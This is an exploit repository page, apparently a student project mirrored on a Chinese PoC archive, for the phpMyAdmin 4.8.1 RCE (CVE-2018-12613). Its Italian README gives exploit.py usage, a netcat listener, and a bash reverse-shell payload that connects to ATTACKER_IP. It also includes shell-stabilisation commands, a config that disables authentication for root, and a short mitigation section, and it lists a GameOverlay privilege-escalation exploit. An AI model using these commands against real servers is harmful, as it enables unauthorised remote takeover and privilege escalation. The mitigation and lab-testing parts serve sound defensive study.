关联漏洞
Description
Dimostrazione di una vulnerabilità RCE (Remote Code Execution) in phpMyAdmin 4.8.1, con exploit per reverse shell e analisi di privilege escalation tramite la vulnerabilità CVE-2023-2640/CVE-2023-32629 (GameOverlay) su kernel Linux.
介绍
# phpMyAdmin 4.8.1 - Remote Code Execution (RCE) Exploit
[](https://www.gnu.org/licenses/gpl-3.0)
[](https://opensource.org)

> **Filosofia Open Source**: Questo progetto è rilasciato sotto **GNU GPLv3** per garantire che tutte le modifiche e derivati rimangano liberi e open source.
> **Avviso Legale**: Utilizzare solo su sistemi autorizzati. La violazione non autorizzata è illegale.
## Panoramica
Exploit per la vulnerabilità **CVE-2018-12613** in phpMyAdmin 4.8.1 che consente:
- Esecuzione di codice remoto (RCE) tramite injection PHP
- Reverse shell interattiva
- Privilege escalation (se combinato con CVE-2023-2640)
## Prerequisiti
- **Target**:
- phpMyAdmin 4.8.0/4.8.1
- PHP < 7.3 (senza `disable_functions` restrittive)
- **Attaccante**:
- Python 3.x
- `netcat` per la reverse shell
## Esecuzione
### 1. Exploit Base (RCE)
python3 exploit.py <TARGET_IP> <PORT> <PHPMA_PATH> <USER> <PASSWORD> "<COMMAND>"
### 2. Reverse Shell
#### 1. Sulla Macchina dell'attaccante
nc -lnvp 4444
#### 2. Eseguire l'exploit con payload bash
python3 exploit.py 192.168.1.100 80 /phpmyadmin admin pass123 \
"bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
#### 3. Post-Exploitation
##### Per ottenere una shell stabile:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Oppure
script /dev/null -c bash
## Configurazione Vulnearbile
### Per testing locale, modificare config.inc.php:
$cfg['Servers'][1]['auth_type'] = 'config'; // Disabilita autenticazione
$cfg['Servers'][1]['user'] = 'root';
$cfg['Servers'][1]['password'] = '';
$cfg['Servers'][1]['AllowNoPassword'] = true;
## Mitigazioni
### 1. Aggiornamento:
sudo apt upgrade phpmyadmin
### 2. Hardering PHP:
; php.ini
allow_url_include = Off
disable_functions = exec,passthru,shell_exec,system
### 3. Regole IPtables:
iptables -A OUTPUT -p tcp --dport 4444 -j DROP
Risorse
CVE-2018-12613
GameOverlay Advisory
MITRE ATT&CK T1190
## Autori
Filippo Zullo
Domenico Palmisano
Alessandro Musto
Elia Sakellarides
## Struttura del Repository
```plaintext
.
├── 📁 exploits/ # Script di exploit
│ ├── 📁 phpmyadmin_rce/ # RCE in phpMyAdmin
│ │ ├── 📄 exploit.py # Script principale (CVE-2018-12613)
│ │ ├── 📄 reverse_shell.sh # Generator per reverse shell
│ │ └── 📄 auth_bypass.md # Tecniche di bypass autenticazione
│ │
│ └── 📁 gameoverlay/ # Privilege escalation
│ ├── 📄 exploit.sh # Exploit CVE-2023-2640
│ └── 📄 kernel_patches.md # Kernel vulnerabili
│
├── 📁 mitigations/ # Contromisure
│ ├── 📁 php_hardening/ # Hardening PHP
│ │ ├── 📄 php.ini.patch # Configurazioni sicure
│ │ └── 📄 apache_config.md # Setup Apache
│ │
│ ├── 📁 iptables_rules/ # Firewall
│ │ ├── 📄 iptables_rules.txt # Regole di blocco
│ │ └── 📄 setup_guide.md # Guida implementazione
│ │
│ └── 📁 kernel_protections/ # Mitigazioni kernel
│ ├── 📄 disable_userns.sh # Disabilita user namespace
│ └── 📄 sysctl_config.md # Configurazione permanente
│
├── 📁 docs/ # Documentazione
│ ├── 📄 project_report.pdf # Report completo (PDF)
│ ├── 📄 setup_guide.md # Istruzioni dettagliate
│ └── 📁 screenshots/ # Prove visive
│ ├── 📄 rce_poc.png # Screenshot RCE
│ └── 📄 iptables_block.png # Traffico bloccato
│
├── 📁 scripts/ # Utility
│ ├── 📄 install_dependencies.sh # Setup automatico
│ └── 📄 cleanup.sh # Pulizia ambiente
│
├── 📄 README.md # Documentazione principale
└── 📄 LICENSE # Licenza GNU GPL-3.0
文件快照
[4.0K] /data/pocs/d1a30ed28c05879a49d63990d98bf45130d36a73
├── [4.0K] exploits
│ └── [4.0K] phpmyadmin_rce
│ ├── [1.6K] exploit.py
│ ├── [ 1] readme.md
│ └── [3.4K] reverse_shell.sh
└── [4.2K] README.md
2 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。